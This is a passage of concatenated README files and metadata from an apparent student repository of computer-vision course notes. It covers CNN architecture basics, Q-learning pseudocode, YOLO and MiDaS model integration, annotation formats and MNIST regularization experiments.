"text": "# RCNN Family\n\n### Inference on pre-trained Detectron model\n* Ran a video on a pre-trained Detectron2 network. Result was uploaded to youtube:\n [](https://www.youtube.com/watch?v=vEUT4G0NxmE)\n\n### Dataset Generation for PPE classes\n\n* Generate datasets from the original PPE dataset images. Need the following datasets:\n 1. Depth Images - This will be from MiDaS network [https://github.com/intel-isl/MiDaS]. MiDaS computes depth from a single image. We perform this on all the images and store it\n 2. Planer Images - From PlaneR-CNN network [https://github.com/NVlabs/planercnn]. PlaneR-CNN detects arbitrary number of planes, and reconstructs piecewise planar surfaces from a single RGB image. It also generates depth images, which we will not be using as depth images from MiDaS are way better that PlaneR-CNN's output\n 3. Bounding Boxes - Already collected by using YoloV3 annotation program\n* Above generated dataset is collected and stored in a single drive folder [https://drive.google.com/drive/folders/1ms6H8JVcTzLD8INZHSQiIVxQ6WgSYpKW?usp=sharing]\n\n"
},
{
"alpha_fraction": 0.7845853567123413,
"alphanum_fraction": 0.7877818942070007,
"avg_line_length": 109.4117660522461,
"blob_id": "4e51e3b99192b9d3b58caa1b802b3d52478acf44",
"content_id": "64eb9313386a7c3e6d6c00af6165b284cb93d059",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 5631,
"license_type": "no_license",
"max_line_length": 345,
"num_lines": 51,
"path": "/Assignment_4/README.md",
"repo_name": "ashxjain/eva",
"src_encoding": "UTF-8",
"text": "## Architectural Basics\n\nBuilding a Deep Neural Network is not easy. But following certain methodology does make it easy enough to understand it and play with it.\n\n#### Analyze Input Dataset and Normalize it\n* Network should be designed keeping dataset in mind. We must look at the dataset and then decide our Architecture\n* It is better to perform Augmentation on dataset to reduce Overfitting of the network. But what sort of Augmentation should be selected, is only known once we have visualized the dataset\n* Images must be normalized so that network trains faster and quickly comes to a minima\n\n#### Getting Network Architecture Right \n* First don't aim at reducing the number of parameters. Aim at getting the network architecture right. By selecting:\n * Number of Layers - Based on the dataset, we must select the number of layers. If dataset demands learning high number of features, then we must have high number of layers\n * Number of Kernels - Same as above, based on the dataset we decide the number of kernels. More the features to learn, more the kernels\n * 3x3 Convolutions - It is always better to use 3x3 convolutions as it is proven to achieve good accuracy. And also it makes run network faster by reducing the number of parameters as compared to using kernels of large size\n * When do we stop convolutions and go ahead with a larger kernel or some other alternative (which we have not yet covered)\n * MaxPooling - Once our network starts learning features, it is required to have some layers to merge learnt features and make some more sense out of it and hence we must use MaxPooling\n * MaxPooling placement\n * From Input Layer - Better to have it after few layers (2-3), so that network learns enough simple features and complicated features\n * From Prediction Layer - Better to have it before few layers (2-3), so that network accumulates all the learnt features and helps in final prediction\n * 1x1 Convolutions - This is very useful in reducing z-axis of the kernel. And alongside MaxPooling it helps merging common features and learn complicated features out of already learnt features\n * Convolution Block - It is better to design the network in blocks. We must have a bunch of layers with increasing number of channels so that the network learns lot of features. And this forms the Convolution Block\n * Transition Layer - MaxPooling and 1x1 Convolution forms the Transition block as it reduces the image size in all the three axis. This forms a very useful layer for reducing the number of parameters and for learning complex features by merging simple features\n * Positioning of Convolution Block and Transition Layer - Having placed them one after the other, makes the network learn better. Learns features, merges them and learns more about. Then again learns some more features and again merges them to learn more about it\n * Number of Paramters - Depending on the compute requirements, this number must be kept in check. Lower the number of paramters, faster the network. And hence network must be designed by keeping this in mind\n * Receptive Field - It is better to keep track of Receptive field after each layer. We must look at the dataset and see what will be the resolution after which there is not much information learnt. For MNIST dataset and many other datasets, it is better to stop after 11x11 Receptive field, because after that we don't learn much from the data\n * Always add output layer size & receptive field info along side network layers, helps a lot in designing the network\n * SoftMax - Should be added at our prediction layer as it gives clear confident output. It increases the difference between the output values\n\n* Once above details are decided, we must run the network and see how it performs. Its okay to not have the best accuracy, but it should be going in that direction. So that we can later improve more on it\n* This forms our base Architecture\n\n#### Running the network\n* Better to run it once to see how the current network performs, so that we can know what sort improvements should be done to it\n* Epochs and Batch-Size should be set to right value depending on the compute available\n* The time taken per epoch depends on the batch size. Higher the batch size, lesser the time per epoch\n* Because we want backprop to learn from not just one class but from all the classes and hence we send images in batches based on random distribution\n* Figuring out what params works for you:\n * First train with high number of params & get accuracy scores\n * Then reduce it, if no drop in accuracy, then reduce further. Stop when reduction is seen. And then choose your network based on accuracy score\n\n#### Improving our base Architecture\n* Batch Normalization - This takes care of normalizing the output of the convolution layers. And hence helps in achieving better accuracy. It is better to place this after every layer, expect before the prediction layer\n* DropOut - Helps in reducing Overfitting i.e. the difference between training and validation accuracy\n* Dropouts can be added after any layers, but shouldn't have it before prediction layer. Ideal value is the range of 0.1\n\n#### Speeding up the Network\n* Once we achieve better results. We can speed our network by figuring out the learning rate\n* Learning rate (LR) changes based on batch size, higher the batch size, smaller the learning rate\n* If LR is too high, then the network will struggle a lot with the minima\n* If LR is too low, then network will take lot of time to reach the minima\n* Hence LR must be set to right value. And right value is chosen based on Trial & Error method\n"
},
{
"alpha_fraction": 0.7215619683265686,
"alphanum_fraction": 0.7235427498817444,
"avg_line_length": 38.266666412353516,
"blob_id": "49b2a06d5e5785fdb5cfbc6ce854d07bdc96bf6c",
"content_id": "c0b46e845167185e43cdc989a1d83c8b310a79ae",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 3534,
"license_type": "no_license",
"max_line_length": 122,
"num_lines": 90,
"path": "/Berkeley-Reinforcement/README.md",
"repo_name": "ashxjain/eva",
"src_encoding": "UTF-8",
"text": "# Berkeley AI Reinforcement Learning Project\n\n- This is an attempt to solve reinforcement project from [Berkeley AI Projects](http://ai.berkeley.edu/reinforcement.html)\n- Project is to edit the following files to get GridWorld working:\n - valueIterationAgents.py - A value iteration agent for solving known MDPs.\n - qlearningAgents.py - Q-learning agents for Gridworld, Crawler and Pacman.\n - analysis.py- A file to put your answers to questions given in the project.\n\n- Pseudo code for functions in qlearningAgents.py:\n* __init__:\n```\nfunction __init__:\n Input: init arguments\n Output: None\n * Initialise QValues table, where each possible (state,action) is initialized to 0\n```\n\n* getQValue:\n```\nfunction getQValue:\n Input: state, action\n Output: QValue\n * Return QValue from QValues table for specified (state,action)\n```\n\n* computeValueFromQValue:\n```\nfunction computeValueFromQValue:\n Input: state\n Output: Value\n * Following is formula to calculate Value from QValue:\n Value(state) = max-over-all-legal-actions(QValue(state, action))\n * Fetch legal actions agent can take from current state using\n `getLegalActions` function. This could be going North, South,\n East, West or Stop.\n * If no legal actions, then return 0.0\n * If there are legal actions i.e in terminal state, then get\n max QValue from the list of QValues computed using `getQValue`\n for all legal actions from current state. Return this max value as output\n```\n\n* computeActionFromQValues:\n```\nfunction computeActionFromQValues:\n Input: state\n Output: Action\n * Fetch legal actions agent can take from current state using\n `getLegalActions` function\n * If there are no legal actions, then return None as best action\n * If there are legal actions i.e. in terminal state, then select\n the action leading to highest QValue from current state as the\n best action and return that as Action output\n```\n\n* getAction:\n```\nfunction getAction:\n Input: state\n Output: Action\n * Fetch legal actions agent can take from current state using\n `getLegalActions` function\n * If there are no legal actions i.e in terminal state, then\n return None as action\n * If there are legal actions, then use `flipCoin` function to\n get probability distribution over epsilon. Depending on the\n `flipCoin` output, we do the following:\n - If true, Select action randomly from legal action and\n return that as output\n - If false, Select best policy action calculated using\n `getPolicy` function for current state and return that\n as output\n```\n\n* update:\n```\nfunction update:\n Input: state, action, nextState, reward\n Output: None\n * Fetch legal actions agent can take from next state using\n `getLegalActions` function\n * Fetch existing QValue i.e QValue at time T-1 using `getQValue` function with current state and action as arguments\n * Get list of QValues for nextState and nextAction using `getQValue` function\n * Using max value from list of Qvalues, and using reward, discount and QValue_Tminus1, compute TD (Temporal Difference)\n * Calculate Temporal Difference at time T\n * TD_T = Reward + discounting-factor * max-actions(\n * QValue(nextstate, nextaction)\n * ) - QValue_Tminus1(state, action)\n * Using all the variables we computed, we set QValue for (state, action) in main QValues table using below formula:\n * QValue(state, action) = QValue_Tminus1(state, action) + learning_rate * TD_T(action, state)\n```\n"
},
{
"alpha_fraction": 0.7581818103790283,
"alphanum_fraction": 0.7774545550346375,
"avg_line_length": 67.75,
"blob_id": "66fba50c179866cfc9d46610a9ad62bb2507c696",
"content_id": "9db2f3e4d6ab91d3e9e275774ddece7dfd8d1439",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 2750,
"license_type": "no_license",
"max_line_length": 295,
"num_lines": 40,
"path": "/P5_S15/README.md",
"repo_name": "ashxjain/eva",
"src_encoding": "UTF-8",
"text": "# Building a single model to perform Object Detection, Depth Estimation and Planes detection on an image\n\n* There are three separate outputs which has three separate models. In this project, we'll integrate them into a single model:\n * Object Detection using YoloV3\n * Depth Estimation using MiDaS\n * 3D Planes Detection using PlanerRCNN\n* Depth/Panes detection output size is same as input size and hences uses Encoder/Decoder architectures\n\n#### **MiDaS**\n* Uses resnext101_32x8d_wsl model with pretrained weights from PyTorch Hub: `facebookresearch/WSL-Images`\n\n <img src=\"https://pytorch.org/assets/images/resnext.png\" alt=\"drawing\" width=\"500\"/>\n\n* Above is ResNEXT 50 (in the right) with Cardinality set to 32 and 4d i.e. residual layer channels start with 128 (4xC=4x32=128). A similar model is used in MiDaS but more parameters i.e. ResNEXT101 with 8d i.e. residual layer channels start with 256 (8xC=8x32=256). This has 4 residual layers.\n\n* Following is a simplified diagram of its architecture:\n <img src=\"images/MiDaS.png\" alt=\"drawing\"/>\n* Above is a good base model to start with i.e. use the pretrained model of MiDaS network and then train the other parts of the final model. MiDaS is chosen as base model for two reasons:\n 1. ResNeXt is a common network across all the three models\n 2. Training code for MiDaS is not available, hence it is good to use the pretrained weights for this model\n\n#### **YoloV3**\n\n* Following is the architecure of YoloV3:\n<img src=\"images/YoloV3Arch.png\" alt=\"drawing\" width=\"1000\"/>\n* As seen above, it is using ResNet. We'll use ResNeXt branch of MiDaS network and then add three branches to get three scales of output of Yolo network\n* So the ResNeXt branch will have pretrained weights of MiDaS network and the output branches will be initialised with pretrained weights of YoloV3 and will later be fine tuned as part of combined training\n* Yolo output branches will be connected to ResNeXt branch with additional convolutional layers which will be trained as part of training\n\n#### **PlaneRCNN**\n\n* Following is a simplified architecture of PlaneRCNN model:\n<img src=\"images/MaskRCNN.png\" alt=\"drawing\"/>\n* As seen above it is a combination of multiple network, but we have common ResNet network here. Hence we can extend MiDaS's ResNeXt branch to incorporate planeRCNN network\n* Similar to YoloV3 model, we will load MiDaS's ResNeXt branch with pretrained model and all the other parts of planeRCNN model will have its own pretrained weights which will be trained\n\n### Conclusion\n* As part of this project, I understood all the models\n* Was able to combine MiDaS and YoloV3 model and train the network. But results are not at all satisfactory\n* Work is in progress to combine PlaneRCNN model\n"
},
{
"alpha_fraction": 0.700834333896637,
"alphanum_fraction": 0.7270560264587402,
"avg_line_length": 32.560001373291016,
"blob_id": "ac93314ea4a0f7e334eacdf070b6af86b873f9f9",
"content_id": "0e0d0d4a7ffea71b53dd61034f7affbc9e0b81fa",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 843,
"license_type": "no_license",
"max_line_length": 108,
"num_lines": 25,
"path": "/P5_S13/README.md",
"repo_name": "ashxjain/eva",
"src_encoding": "UTF-8",
"text": "# YOLO V2/3\n\n* This session deals with training Yolo on Google Colab\n* use YoloV3 annotation tool to get dataset annotated in the format required by the model\n* Followed this repo to perform Yolo training on our custom dataset: https://github.com/theschoolofai/YoloV3\n\n### Extract frames from Video using ffmpeg:\n```\n❯ ffmpeg -i YoloDatasetVideo.mp4 -r <number-of-fps> $filename%03d.jpg\n```\n\n### Merge frames to form Video using ffmpeg:\n```\n❯ ffmpeg -r <number-of-fps> -i %03d.jpg out.mp4\n```\n\n### Sample Videos and their annotations\n* Can be found in sample_videos folder\n* Annotations are on Youtube:\n- video1:\n\n [](https://www.youtube.com/watch?v=5q4j3JOMBtc)\n- video2:\n\n [](https://www.youtube.com/watch?v=PN-TCIcZW5E)\n"
},
{
"alpha_fraction": 0.6335973143577576,
"alphanum_fraction": 0.6615256071090698,
"avg_line_length": 41.83928680419922,
"blob_id": "45bcfe128e000d606150b6b986553a7ac9585f31",
"content_id": "127a1a5459ee6e7b9d58990b81db16910e30239c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 2399,
"license_type": "no_license",
"max_line_length": 354,
"num_lines": 56,
"path": "/P5_S12/README.md",
"repo_name": "ashxjain/eva",
"src_encoding": "UTF-8",
"text": "## Object Localization\n\n* To understand object localisation, following is done in this project:\n * Collect dataset of people wearing hardhat,mask,vest,boots\n * Annotations i.e. bounding boxes of above classes collected using VGG annotation tools\n * Peform K-means clustering on bounding boxes on above collected dataset\n\n#### Understanding annotation format by VGG annotation tool\n```\n{\n \"img001.jpg375173\": {\n \"filename\": \"img001.jpg\",\n \"size\": 375173,\n \"regions\": [\n {\n \"shape_attributes\": {\n \"name\": \"rect\",\n \"x\": 164,\n \"y\": 258,\n \"width\": 66,\n \"height\": 45\n },\n \"region_attributes\": {\n \"class\": \"hardhat\"\n }\n },\n .\n .\n {\n \"shape_attributes\": {\n \"name\": \"rect\",\n \"x\": 134,\n \"y\": 603,\n \"width\": 96,\n \"height\": 80\n },\n \"region_attributes\": {\n \"class\": \"boots\"\n }\n }\n ],\n \"file_attributes\": {}\n },\n```\n* Above is a snippet from annotation JSON output of VGG annotation tool\n* Each entry is of an image file and attributes associated with that image\n* It is key-value pair, with key being filename concatenated with the size of the file. From above example, it is `img001.jpg375173`, where `img001.jpg` is filename and `375173` is file size in bytes\n* The value of each entry contains attributes about the file like: `filename`, `size` in bytes, `regions`, `file_attributes`\n* `regions` are bounding boxes of region of interest in the image. Their centroid (`x`, `y`) and their `width` and `height` are stored as part of `shape_attributes`. Each bounding box is labeled with one or more `region_attributes`. These `region_attributes` are key-value pairs used to store metadata about the selected boxes (boudning box) in the image\n* `file_attributes` are key-value pairs used to store metadata about complete file itself\n* Above annotation tool is mainly used to annotate (in above format) objects in the image and later use this to train the network to predict such bounding boxes on test/validation dataset\n\n#### References:\n* VGG Annotator: http://www.robots.ox.ac.uk/~vgg/software/via/via_demo.html\n* K-Means tutorial: https://youtu.be/4b5d3muPQmA \n* K-Means Clustering Python: https://towardsdatascience.com/machine-learning-algorithms-part-9-k-means-example-in-python-f2ad05ed5203\n"
},
{
"alpha_fraction": 0.511118471622467,
"alphanum_fraction": 0.732824444770813,
"avg_line_length": 56.94230651855469,
"blob_id": "19f43023703a4429d8cf1e28d919637ec9431e21",
"content_id": "df679a1d1ea0cf0a5f7d849037a80e1b53798d2a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 3013,
"license_type": "no_license",
"max_line_length": 414,
"num_lines": 52,
"path": "/Assignment_1/Assignment_1B.md",
"repo_name": "ashxjain/eva",
"src_encoding": "UTF-8",
"text": "## Assignment-1B\n\n### What are Channels and Kernels (according to EVA)?\n\nChannels are similar feature bags. For example, a RGB image has 3 channels for each color. Post convolution, the image contains as many channels as the kernel. Usually when there are lots of features in the input channel, kernel is set to have high channels to group all the similar features. Like for MNIST database, all vertical edges will be together in one channel, all horizontal edges in another channel etc.\nKernels are a simple matrix which convolves on the input image to extract features. For example, a horizontal edge kernel will extract all the edges from the input image. \n\nChannels and kernels go hand in hand. As kernels extracts the features, channels groups the similar features.\n\n### Why should we only (well mostly) use 3x3 Kernels?\n\nUsage of 3x3 kernels leads to less parameters and hence making it more computation efficient. Higher dimensions can be modeled with 3x3 kernel with lesser parameters. For example a 5x5 kernel can be achieved by using two 3x3 kernel. If we compare number of parameters for a 5x5 kernel and two 3x3 kernel:\n\n```\nOne 5x5 kernel : 1*5*5=25 parameters\nTwo 3x3 kernel : 2*3*3=18 parameters\n```\n\nIt can be observed that the number of parameters reduces and hence saves lot of computations. Following [plot](https://goo.gl/d6RAaW) shows the number of parameters with respective to input image of dimension nxn:\n\n\n\nIt can also be inferred that with increased input size, two 3x3 kernel performs better than a single 5x5 kernel. Similarly, a 7x7 kernel can be replaced with three 3x3 kernel.\n\nAlso with 3x3 kernel, we get more number of layers and hence we can capture more complex features.\n\n### How many times do we need to perform 3x3 convolution operation to reach 1x1 from 199x199 (show calculations)\n\n* 99 Times\n```\n199x199 | 197x197 | 195x195 | 193x193 | 191x191 | 189x189 = 5\n189x189 | 187x187 | 185x185 | 183x183 | 181x181 | 179x179 = 5\n179x179 | 177x177 | 175x175 | 173x173 | 171x171 | 169x169 = 5\n169x169 | 167x167 | 165x165 | 163x163 | 161x161 | 159x159 = 5\n159x159 | 157x157 | 155x155 | 153x153 | 151x151 | 149x149 = 5\n149x149 | 147x147 | 145x145 | 143x143 | 141x141 | 139x139 = 5\n139x139 | 137x137 | 135x135 | 133x133 | 131x131 | 129x129 = 5\n129x129 | 127x127 | 125x125 | 123x123 | 121x121 | 119x119 = 5\n119x119 | 117x117 | 115x115 | 113x113 | 111x111 | 109x109 = 5\n109x109 | 107x107 | 105x105 | 103x103 | 101x101 | 99x99 = 5\n99x99 | 97x97 | 95x95 | 93x93 | 91x91 | 89x89 = 5\n89x89 | 87x87 | 85x85 | 83x83 | 81x81 | 79x79 = 5\n79x79 | 77x77 | 75x75 | 73x73 | 71x71 | 69x69 = 5\n69x69 | 67x67 | 65x65 | 63x63 | 61x61 | 59x59 = 5\n59x59 | 57x57 | 55x55 | 53x53 | 51x51 | 49x49 = 5\n49x49 | 47x47 | 45x45 | 43x43 | 41x41 | 39x39 = 5\n39x39 | 37x37 | 35x35 | 33x33 | 31x31 | 29x29 = 5\n29x29 | 27x27 | 25x25 | 23x23 | 21x21 | 19x19 = 5\n19x19 | 17x17 | 15x15 | 13x13 | 11x11 | 9x9 = 5\n9x9 | 7x7 | 5x5 | 3x3 | 1x1 = 4\nTotal = 5*19 + 4*1 = 99 times\n```\n"
},
{
"alpha_fraction": 0.6947368383407593,
"alphanum_fraction": 0.7263157963752747,
"avg_line_length": 18,
"blob_id": "572fee766e7626817518bbb9a7678a868bd4831b",
"content_id": "d77379bef2b66af84d5496f7ed29e5415ee31789",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 95,
"license_type": "no_license",
"max_line_length": 41,
"num_lines": 5,
"path": "/P2_S7/README.md",
"repo_name": "ashxjain/eva",
"src_encoding": "UTF-8",
"text": "# Installation\n\n* conda install pytorch==0.3.1 -c pytorch\n\n* conda install -c conda-forge kivy\n"
},
{
"alpha_fraction": 0.43094170093536377,
"alphanum_fraction": 0.5661435127258301,
"avg_line_length": 39.180179595947266,
"blob_id": "89b7e4b742e3c716ba757c9a097912b7ad28af97",
"content_id": "526f231541b306b42cfbe19b5516a1e4fc41c9cd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 4460,
"license_type": "no_license",
"max_line_length": 176,
"num_lines": 111,
"path": "/P5_S6/README.md",
"repo_name": "ashxjain/eva",
"src_encoding": "UTF-8",
"text": "### MNIST Classification using L1/L2/BatchNorm/GhostBatchNorm techniques\n\n* **Assignment 6** by Ashish Jain & Rahul Jain\n\n* Base Model: This is the base model we started with. It is a simple model where we used BatchNorm & Dropout & Image Augmentation techniques. With following configuration:\n\n * Batch Size = 128\n * Epochs = 15\n\n* Following is the result of base model:\n\n * Parameters: 6,765\n\n * Best Test Accuracy: 99.52\n\n * Last 5 epochs:\n\n | Train Loss | Train Accuracy | Test Loss | Test Accuracy |\n | ---------- | -------------- | --------- | ------------- |\n | 0.1435 | 98.14 | 0.0195 | 99.43 |\n | 0.1070 | 98.27 | 0.0192 | 99.42 |\n | 0.0379 | 98.19 | 0.0182 | 99.51 |\n | 0.0163 | 98.27 | 0.0181 | 99.52 |\n | 0.0192 | 98.30 | 0.0192 | 99.48 |\n\n\n### Experiments with L1, L2, BatchNorm, GhostBatchNorm techniques\n\nTried the following techniques on above base model with same configuration as above except the following is run for 15 Epochs:\n\n* Base Model with L1 + BN:\n * With regularization parameter (lambda) set to 0.001\n * Last 5 epoch stats:\n | Train Loss | Train Accuracy | Test Loss | Test Accuracy |\n | ---------- | -------------- | --------- | ------------- |\n | 0.0835 | 98.44 | 0.0183 | 99.45 |\n | 0.0915 | 98.46 | 0.0174 | 99.47 |\n | 0.1342 | 98.42 | 0.0175 | 99.47 |\n | 0.1245 | 98.41 | 0.0175 | 99.54 |\n | 0.0845 | 98.39 | 0.0179 | 99.43 |\n * Adding L1 regularization didn't affect the result. It is almost same as what we got for base model\n \n* Base Model with L2 + BN:\n \n * For L2, have setting the following args to optimizer SGD:\n ` optimizer = optim.SGD(model.parameters(), lr=0.1, momentum=0.9, dampening=0, weight_decay=0, nesterov=False)`\n * Last 5 epoch stats:\n | Train Loss | Train Accuracy | Test Loss | Test Accuracy |\n | ---------- | -------------- | --------- | ------------- |\n | 0.0626 | 98.36 | 0.0188 | 99.40 |\n | 0.1241 | 98.41 | 0.0184 | 99.43 |\n | 0.0592 | 98.42 | 0.0194 | 99.38 |\n | 0.0543 | 98.39 | 0.0190 | 99.37 |\n | 0.0811 | 98.39 | 0.0187 | 99.41 |\n \n * Accuracy reduced slightly with L2 regularization\n * L2 regularization only helps if the dataset is complex, in this case it is not\n \n* Base Model with L1 and L2 with BN\n \n * Same configuration is set as done for above L1/L2\n \n * Last 5 epoch stats:\n | Train Loss | Train Accuracy | Test Loss | Test Accuracy |\n | ---------- | -------------- | --------- | ------------- |\n | 0.0801 | 98.34 | 0.0185 | 99.40 |\n | 0.1296 | 98.39 | 0.0185 | 99.39 |\n | 0.1104 | 98.47 | 0.0178 | 99.35 |\n | 0.1515 | 98.36 | 0.0191 | 99.34 |\n | 0.1539 | 98.42 | 0.0180 | 99.36 |\n \n * Again no improvement, this is because of L2 regularization\n \n* Base Model with GBN\n \n * Num_splits set to 2\n \n * Last 5 epoch stats:\n | Train Loss | Train Accuracy | Test Loss | Test Accuracy |\n | ---------- | -------------- | --------- | ------------- |\n | 0.0196 | 98.22 | 0.0206 | 99.33 |\n | 0.0659 | 98.17 | 0.0214 | 99.36 |\n | 0.1076 | 98.13 | 0.0220 | 99.35 |\n | 0.0562 | 98.25 | 0.0214 | 99.36 |\n | 0.0924 | 98.22 | 0.0211 | 99.38 |\n * Although accuracy is less compared to L1. But, there is scope for improvement if we run it for more number of epochs (as train accuracy is less)\n \n* Base Model with L1 and L2 with GBN\n * Same configuration is set as done for above L1/L2/GBN\n \n * Last 5 epoch stats:\n \n | Train Loss | Train Accuracy | Test Loss | Test Accuracy |\n | ---------- | -------------- | --------- | ------------- |\n | 0.2046 | 98.38 | 0.0168 | 99.38 |\n | 0.1108 | 98.38 | 0.0176 | 99.42 |\n | 0.0901 | 98.26 | 0.0184 | 99.34 |\n | 0.2001 | 98.41 | 0.0176 | 99.42 |\n | 0.0718 | 98.32 | 0.0177 | 99.37 |\n \n * L2 is causing the problem here. L1 gives some improvement, but again GBN reduces train accuracy and hence gives room for more improvement by running it for some more epochs\n\n### Final Results Visualized\n\n* Loss/Accuracy graphs of above experiments\n\n\n\n* 25 mis-classified images with GhostBatchNorm. Most of the following images, will be predicted wrong by humans itself\n\n\n"
},
{
"alpha_fraction": 0.7485898733139038,
"alphanum_fraction": 0.7635777592658997,
"avg_line_length": 63.63541793823242,
"blob_id": "96050149a50909afce9cfe80aa3fd07edda3eef8",
"content_id": "1612109a7df123362a86f9e1403391bb617e7267",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 6205,
"license_type": "no_license",
"max_line_length": 317,
"num_lines": 96,
"path": "/eva.md",
"repo_name": "ashxjain/eva",
"src_encoding": "UTF-8",
"text": "### AI Notes from Extensive Vision AI Program - 2019\n\n#### When to use strides > 1?\n\n* When classification is not that important. Like counting objects on a conveyor belt\n* To make network faster\n* Suitable for low end hardware like Raspberry PI\n* Using strides > 1 causes issues like checkerboard. Network sees the image in blurred fashion like how one having spectacles see the world without spectacles\n\n#### Common network building blocks\n\n* For a input size of 400x400x3, we usually convolve with 3x3 kernel till receptive field of 11x11 is reached with increasing number of channels: 32 -> 64 -> 128 -> 256 -> 512. This forms one **convolution block**\n* Usually till here edges & gradients are learnt by the kernels\n* 1x1 will merge features rather than figuring out something new like what 3x3 kernel does. It merges edges & gradients seen together in spatial domain and not form new textures out of it. 3x3 can achieve the same thing, but for that it has to reach a receptive field to see all the common edges in the spatial domain\n* 1x1 also acts like a filter. Say in a imageNet network, a image of dog with sofa & bed in background in it. 1x1 will filter sofa & bed from it only passing dog in further layers\n* 1x1 reduces number of channels\n* 1x1 with Max-Pooling forms **transition block**. Because it reduces image dimensions without loosing much information\n* This is how modern networks are designed:\n * Input Layer\n * Convolution Layer\n * Convolution Block - Transition Block\n * Convolution Block - Transition Block\n * . . .\n * Output Layer\n* Above is called `Squeeze & Excitation Architecture`\n\n#### Methodology for building a network\n\n* Look at images in the dataset and figure out the final receptive field which will cover all the images. Also make sure there is no much data on the edges, as convolution without padding ignores data at edges\n* Perform Image Augmentation by first looking at the dataset\n* Build the network with above convolution & transition blocks\n* Network should be designed to gather following information:\n * Edges & Gradients\n * Textures\n * Patterns\n * Part Of Objects\n * Objects\n* Max pooling can be used after each information is found\n* Do not use Fully Connected Layers\n* Use `ReLU` as activation function\n* Do not use Activation function like ReLU before Softmax, as negative values are required for Softmax calculations\n\n#### What is more important RAM or CPU cores?\n\n* RAM. Because network will be loaded in RAM. If we have less RAM and more CPU, then we can't load the network and hence no use of CPU cores\n\n#### How to think about Architecture\n\n* First don't aim at reducing the number of parameters. Aim at getting the network architecture right\n* Always add output layer size & receptive field info along side network layers\n* Since we are not using Global Average Pooling (as of now), we are using kernel of same size as input to the final layer to get single output\n* When we reach 11x11 or 10x10, we have almost lost our data so no point convolving beyond that (assumption is for MNIST dataset)\n* Bias is of no use for Image Convolution, because Kernel are never zero. Hence we always set bias to 0\n* But in the calculation of params, bias comes into picture. 1 per kernel. If 3x3 kernel & 32 of those, then params = [(3x3)+1]x32 = 320 params\n* The time taken per epoch depends on the batch size. Higher the batch size, lesser the time per epoch\n* Because we want backprop to learn from not just one class but from all the classes and hence we send images in batches based on random distribution\n* Learning rate changes based on batch size, higher the batch size, smaller the learning rate\n* Figuring out what params works for you:\n * First train with high number of params & get accuracy scores\n * Then reduce it, if no drop in accuracy, then reduce further. Stop when reduction is seen. And then choose your network based on accuracy score\n* Once network is fixed, then add thinbgs like Batch Normalization, Dropout etc.\n* Should RELU come before BN or viceversa? -> No clear answer as of now\n* Dropouts can be added after any layers, but shouldn't have it before prediction layer. Ideal value is the range of 0.1\n* Sample network design flow:\n * 1st DNN:\n * Simple squeeze & excite network, no BN, Dropout, ImgAug, LRScheduler etc\n * High number of parameters\n * 2nd DNN:\n * Reduce number of channels in each layer and hence reduction in number of parameters\n * Same Architecture is maintained\n * 3rd DNN:\n * Add BN layers\n * 4th DNN:\n * Increase some more parameters as we wanted it to under 15K, hence we have the luxury to increase it\n * 5th DNN:\n * Add Dropout\n * 6th DNN:\n * Set Learning Rate, now with less epochs we get our accuracy\n\n# Final Q&A Session 8\n* With Depthwise separable convolution -> less params, high kernel size -> High expressivity with low cost\n* Today nobody uses Add, only Concat\n* Upsampling doesn't help with image accuracy. It is only used for super resolution & encoder/decoder networks\n* For concat of different output sizes, we must use `space-to-depth`\n* Reducing learning rate is also regularization\n* Droput in Fully Convolution Layers, drops pixels -> which is not a good strategy for DNN\n* Use spatial dropouts, which drops channels\n* With increased padding, we loose information\n* We avoid stride > 1, as it adds checkerboard. But if we want to run it on constrained hw, then we do use it.\n* For MNIST our base batch size can be 128, For CIFAR10 256 or 512. Once we get some good accuracy with our set batch size, then play with LR to see if we can have some more improvements\n* It is good to have bottleneck layers in your network. Add it avoids overfitting and does give better learning\n* Resnet 34 -> ideal network to start with, as it gives good performance with low params\n* Main focus should be on data augmentation & loss function\n* For production deployment, we are left with Resnet | Inception | Densenet. Resnet == iOS user, Inception == Android User, Densenet == Blackberry user\n* Normalization should also be done on testing dataset as well\n* LR will depend on which stage we are, hence better to use a LR calculator which will figure out LR for use\n"
},
{
"alpha_fraction": 0.4568469524383545,
"alphanum_fraction": 0.5650172829627991,
"avg_line_length": 38.5,
"blob_id": "077eb1606cc4cc955176d6c879f38d3d22d4078f",
"content_id": "64c4e4a55ab09d08cbe91faefa13fc12346ba35e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1738,
"license_type": "no_license",
"max_line_length": 138,
"num_lines": 44,
"path": "/P5_S9/QuizDNN.py",
"repo_name": "ashxjain/eva",
"src_encoding": "UTF-8",
